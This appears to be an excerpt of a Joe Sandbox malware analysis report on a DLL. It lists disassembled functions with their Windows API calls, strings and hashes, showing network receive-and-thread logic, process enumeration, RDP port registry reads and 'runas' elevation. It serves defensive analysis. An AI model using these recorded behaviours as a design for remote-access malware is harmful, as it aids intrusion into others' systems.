                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@2@@std@@D@std@@Refcnt@?$basic_string@U?$char_traits@V?$allocator@$CloseHandle$#825
                                                          • String ID:
                                                          • API String ID: 3981934315-0
                                                          • Opcode ID: 8b2b594f4aed80e73da269208a1a90eec485e5e9e688899508e82b25adb2269c
                                                          • Instruction ID: 3f5e6c1ba8cdd1ffd5d3919399f724efa296fb395ea5f4111f29f1806b4e9a25
                                                          • Opcode Fuzzy Hash: 8b2b594f4aed80e73da269208a1a90eec485e5e9e688899508e82b25adb2269c
                                                          • Instruction Fuzzy Hash: A53182747006019FE744CF29C980996B7E9FF85790B14866DF95ACB795EB30EC40CBA0
                                                          Function 1002CC90 Relevance: 9.1, APIs: 6, Instructions: 88sleepthreadnetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _snprintf.MSVCRT ref: 1002CCCF
                                                            • Part of subcall function 1002CBD0: inet_addr.WS2_32(?), ref: 1002CBDA
                                                          • recv.WS2_32(00000000,?,00000002,00000000), ref: 1002CD31
                                                          • CreateThread.KERNEL32(00000000,00000000,1002CBF0,?,00000000,?), ref: 1002CD80
                                                          • CloseHandle.KERNEL32(00000000), ref: 1002CD94
                                                          • Sleep.KERNEL32(000003E8), ref: 1002CD9D
                                                          • closesocket.WS2_32(00000000), ref: 1002CDB1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateHandleSleepThread_snprintfclosesocketinet_addrrecv
                                                          • String ID:
                                                          • API String ID: 1576220768-0
                                                          • Opcode ID: efdff814b33b8202b6fd591e2a201419e304869a90dd133dfa35aec09eac1fc2
                                                          • Instruction ID: c4cf38fdf5401ec59896369bf81f1cbf2d42b6e420d5ad3730b6c5288892d0d0
                                                          • Opcode Fuzzy Hash: efdff814b33b8202b6fd591e2a201419e304869a90dd133dfa35aec09eac1fc2
                                                          • Instruction Fuzzy Hash: 5D31B178104355ABD310DF54DC80F9B77E8FBC8740F50492DFA88933A1D775A9468BA2
                                                          Function 1001A2D0 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: malloc$Tablefree
                                                          • String ID:
                                                          • API String ID: 2903114640-0
                                                          • Opcode ID: 86186fa1577d632ba100a165714a33ce1776c10956f63b3ae715142a8fd396b4
                                                          • Instruction ID: a9296b02b71586264760a7329d97d0c6985c525f31e5c152af02a019acfba51a
                                                          • Opcode Fuzzy Hash: 86186fa1577d632ba100a165714a33ce1776c10956f63b3ae715142a8fd396b4
                                                          • Instruction Fuzzy Hash: 8C1144736022246BD315CA1EBC81BDFB3D8FBC1661F14052AF919CB240DB25EE8586E2
                                                          Function 1002BE50 Relevance: 9.1, APIs: 6, Instructions: 53processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002BE71
                                                          • Process32First.KERNEL32(00000000,00000000), ref: 1002BE8B
                                                          • _strcmpi.MSVCRT ref: 1002BEA7
                                                          • Process32Next.KERNEL32(00000000,?), ref: 1002BEB6
                                                          • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 1002BEC0
                                                          • CloseHandle.KERNEL32(00000000,?,75A38400), ref: 1002BED3
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32_strcmpi
                                                          • String ID:
                                                          • API String ID: 2975077063-0
                                                          • Opcode ID: f37c4a8f1e108d711664304603285570b95f9b7a6bb29a86161c82b5fdfa154d
                                                          • Instruction ID: 6ed28245b0ed33383696f76e5f749c63f4d2afb73675a39276b596060f345c94
                                                          • Opcode Fuzzy Hash: f37c4a8f1e108d711664304603285570b95f9b7a6bb29a86161c82b5fdfa154d
                                                          • Instruction Fuzzy Hash: 6F01B17A1016116EE750EB24EC80ADF73D9FB85361F854929FE5882280DB3CA91986B2
                                                          Function 10025120 Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 49stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfA.USER32 ref: 1002516A
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • lstrlenA.KERNEL32(?), ref: 10025196
                                                          • lstrlenA.KERNEL32(?), ref: 100251A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823lstrlen$AddressLibraryLoadProcwsprintf
                                                          • String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
                                                          • API String ID: 2676723305-3034822107
                                                          • Opcode ID: 2c1f5070db8a4b7e35b2bf510d3ccaee469d158e4b5e32a747980c0f01309f3c
                                                          • Instruction ID: 07e6f760477bac333c424709a16e2736ed7e486a252221b6b018aa095331e521
                                                          • Opcode Fuzzy Hash: 2c1f5070db8a4b7e35b2bf510d3ccaee469d158e4b5e32a747980c0f01309f3c
                                                          • Instruction Fuzzy Hash: B30149B23002143FE7249224DC42FFB739AEFC8314F40483DFB05A7280DA79AD4586A6
                                                          Function 1002E1A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: getenvmallocsscanf
                                                          • String ID: %ld%c$JPEGMEM$x
                                                          • API String ID: 677315340-3402169052
                                                          • Opcode ID: 8ea0386d3c4958d7858928c8dcae0d19ada14aa46442e30d69938e83600899c2
                                                          • Instruction ID: f96980eed612b48693667c15894a15213f9622dcf7bb22cb4eb33f436598584c
                                                          • Opcode Fuzzy Hash: 8ea0386d3c4958d7858928c8dcae0d19ada14aa46442e30d69938e83600899c2
                                                          • Instruction Fuzzy Hash: AD4159B04447868FD320CF19E880957FBF8FF45344B904A6EE19A8B651E776E909CF81
                                                          Function 1000EC20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000EC48
                                                            • Part of subcall function 1000EBE0: GetVersionExA.KERNEL32 ref: 1000EBF3
                                                          • ShellExecuteExA.SHELL32(0000003C), ref: 1000ECE7
                                                          • ExitProcess.KERNEL32 ref: 1000ECF5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteExitFileModuleNameProcessShellVersion
                                                          • String ID: <$runas
                                                          • API String ID: 984616556-1187129395
                                                          • Opcode ID: f3f26a1f37ebc56c2e8fe9b480a5dc3c289569165e6538ef6aaa3bf10f4102be
                                                          • Instruction ID: 17113ab1ae356f6cc16b3b480fb140d325540a2caf6588daec690853a855f2e8
                                                          • Opcode Fuzzy Hash: f3f26a1f37ebc56c2e8fe9b480a5dc3c289569165e6538ef6aaa3bf10f4102be
                                                          • Instruction Fuzzy Hash: 9721D5711087849FE314DB68C8147EBB7D6FBC4350F400A2DEB9A932D0DBB59A09CB96
                                                          Function 10009E80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteExA.SHELL32 ref: 10009EC1
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10009ED2
                                                          • CloseHandle.KERNEL32(?), ref: 10009EDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExecuteHandleObjectShellSingleWait
                                                          • String ID: <$@
                                                          • API String ID: 3837156514-1426351568
                                                          • Opcode ID: a256fbbcab775a1f3604715199f882c7f0444da02567230ad93e6343b4ac91f9
                                                          • Instruction ID: 4f3a71a7022bf43642dcc1f3ab8c414678e0bae02fb7ae8385496add38081c6f
                                                          • Opcode Fuzzy Hash: a256fbbcab775a1f3604715199f882c7f0444da02567230ad93e6343b4ac91f9
                                                          • Instruction Fuzzy Hash: 86F08C715083409BE704CF28C848A5BBBE4BFC4350F084A2DF289972A0DBB6DA44CB96
                                                          Function 1001AC50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                          • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                          • FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: RtlGetNtVersionNumbers$ntdll.dll
                                                          • API String ID: 145871493-1263206204
                                                          • Opcode ID: a98ca3340a1305be5a7cfcd569fd1683611f9d629b3645fd6081658504a1bc25
                                                          • Instruction ID: d7f270ee10dbe0d5443bb834cdf5db42320fa0b4d044a01f975dae71d1b6a05e
                                                          • Opcode Fuzzy Hash: a98ca3340a1305be5a7cfcd569fd1683611f9d629b3645fd6081658504a1bc25
                                                          • Instruction Fuzzy Hash: 02F0307A3016226BD3619B29DC8899B77A9EFC6710B164A28F808D7240D738D842C6B1
                                                          Function 10010B70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15librarysleeploaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,WaitForSingleObject,?,10016C10,?,?,?,?,?,10098A80,000000FF), ref: 10010B7D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10010B84
                                                          • Sleep.KERNEL32(00000096,?,?,?,?,?,10098A80,000000FF), ref: 10010B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: KERNEL32.dll$WaitForSingleObject
                                                          • API String ID: 188063004-3889371928
                                                          • Opcode ID: 1505c6372a6b5f5a7e2015909548fb5756e583b9251caf1c5d531eae02cc10d3
                                                          • Instruction ID: 2f25d5efcf6a9ea09ffc80339e96632aadd97f0a1fca395ea0de9424a810f75f
                                                          • Opcode Fuzzy Hash: 1505c6372a6b5f5a7e2015909548fb5756e583b9251caf1c5d531eae02cc10d3
                                                          • Instruction Fuzzy Hash: 67D0C7790041256BEA2457A4AD4CDEA3654FB493317040744F525512D1CE609C40C770
                                                          Function 100069F0 Relevance: 7.6, APIs: 6, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea42a18e97e3a82291b809ecb384a12a17950c0088f0337ebea46ea9f423f3cf
                                                          • Instruction ID: c650882347852e35ffcbb4eb416d17d698f5a118f4f7130cf3c30c4ac611ed04
                                                          • Opcode Fuzzy Hash: ea42a18e97e3a82291b809ecb384a12a17950c0088f0337ebea46ea9f423f3cf
                                                          • Instruction Fuzzy Hash: E141D5B27003056FF704DF689C81B6777D9FB48395F24452AFA05DB686DB71E80487A0
                                                          Function 10029410 Relevance: 7.6, APIs: 5, Instructions: 98stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10005230: #823.MFC42 ref: 1000525B
                                                            • Part of subcall function 10005230: #823.MFC42(?), ref: 1000526A
                                                          • lstrlenA.KERNEL32(?), ref: 1002945B
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 10029478
                                                          • lstrlenA.KERNEL32(?), ref: 100294B8
                                                          • LocalSize.KERNEL32(00000000), ref: 100294FC
                                                          • LocalFree.KERNEL32(00000000), ref: 1002950E
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$#823lstrlen$AllocFreeSize
                                                          • String ID:
                                                          • API String ID: 933119475-0
                                                          • Opcode ID: de1fdc764fb6d7af8fcdc614c3befe84ce97db36611e3d77dc9292dca938265c
                                                          • Instruction ID: baa6dfe5b62ae598e36d45df49c35083ba28316c69925bc8e8f86ac0ab45f9a0
                                                          • Opcode Fuzzy Hash: de1fdc764fb6d7af8fcdc614c3befe84ce97db36611e3d77dc9292dca938265c
                                                          • Instruction Fuzzy Hash: A331B0756083418FD310DF18C884B5BB7E0FB89750F940A1CF896A7390DB34E906CBA2
                                                          Function 100172E0 Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?), ref: 10017309
                                                          • CloseHandle.KERNEL32(?), ref: 10017316
                                                          • #823.MFC42(00000110), ref: 1001733A
                                                          • #823.MFC42(00000110), ref: 1001736B
                                                            • Part of subcall function 10018A50: LoadCursorA.USER32(00000000,00000000), ref: 10018B13
                                                          • #823.MFC42(00000110), ref: 10017392
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$CloseCursorHandleLoadObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1032503192-0
                                                          • Opcode ID: 4d1a71cbad2e8490f7bdd0b7b2d5e33d221c358bfa213511aab1859ad13583ec
                                                          • Instruction ID: 5a9ae8d5125f4473acdfdc2c571faec41a6d57683b79152a5b2af942287cdb62
                                                          • Opcode Fuzzy Hash: 4d1a71cbad2e8490f7bdd0b7b2d5e33d221c358bfa213511aab1859ad13583ec
                                                          • Instruction Fuzzy Hash: 0E31A0746447419BE724CF348C06BCABAE1FF49700F000A2DF6AA9B2C1D7B1E684C792
                                                          Function 10019260 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDIBSection.GDI32(10019096,?,00000000,10019096,00000000,00000000), ref: 100192BE
                                                          • SelectObject.GDI32(?,00000000), ref: 100192CD
